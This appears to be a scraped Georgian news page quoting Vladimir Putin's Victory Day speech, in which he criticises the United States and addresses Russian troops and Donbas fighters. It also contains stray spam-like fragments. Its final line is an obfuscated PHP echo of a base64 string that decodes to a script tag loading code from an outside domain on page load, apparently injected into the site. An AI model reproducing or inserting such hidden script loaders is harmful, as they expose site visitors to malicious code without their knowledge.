tube
ავერსი jaluzi
რუსეთის პრეზიდენტმა ვლადიმერ პუტინმა ფაშიზმზე გამარჯვების დღის აღსანიშნავ საზეიმო აღლუმზე სიტყვით გამოსვლისას განაცხადა, რომ ამერიკის შეერთებული შტატები განსაკუთრებით საბჭოთა კავშირის დაშლის შემდეგ თავის განსაკუთრებულობაზე ალაპარაკდა და ამცირებდა დანარჩენ მსოფლიოს.
 
„ამერიკის შეერთებული შტატები განსაკუთრებით საბჭოთა კავშირის დაშლის შემდეგ თავის განსაკუთრებულობაზე ალაპარაკდა. ამცირებდა რა ამასთან ერთად არა მხოლოდ მთელ მსოფლიოს, არამედ თავის სატელიტებსაც, რომლებსაც უწევთ თავი ისე დაიჭირონ, თითქოს ვერაფერს ვერ ამჩნევენ და ამას მორჩილად ყლაპავენ. მაგრამ ჩვენ სხვანაირი ქვეყანა ვართ, რუსეთს სხვანაირი ხასიათი აქვს, ჩვენ არასდროს არ ვიტყვით უარს ჩვენი სამშობლოს სიყვარულზე, რწმენაზე, ტრადიციულ ფასეულობებზე, წინაპრების წეს-ჩვეულებებზე, ყველა ხალხისა და კულტურის მიმართ პატივისცემაზე. დასავლეთში კი ეს ათასწლეული ფასეულობები, როგორც ჩანს, გადაწყვიტეს გაეუქმებინათ.
 
მივმართავ ახლა ჩვენს შეიარაღებულ ძალებსა და დონბასის მებრძოლებს, თქვენ იბრძვით სამშობლოსთვის, მისი მომავლისთვის, იმისთვის, რომ არავინ არ დაივიწყოს მეორე მსოფლიოს ომის გაკვეთილი, რომ მსოფლიოში არ იყოს ჯალათების, დამსჯელებისა და ნაცისტების ადგილი”, - განაცხადა პუტინმა.
929
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");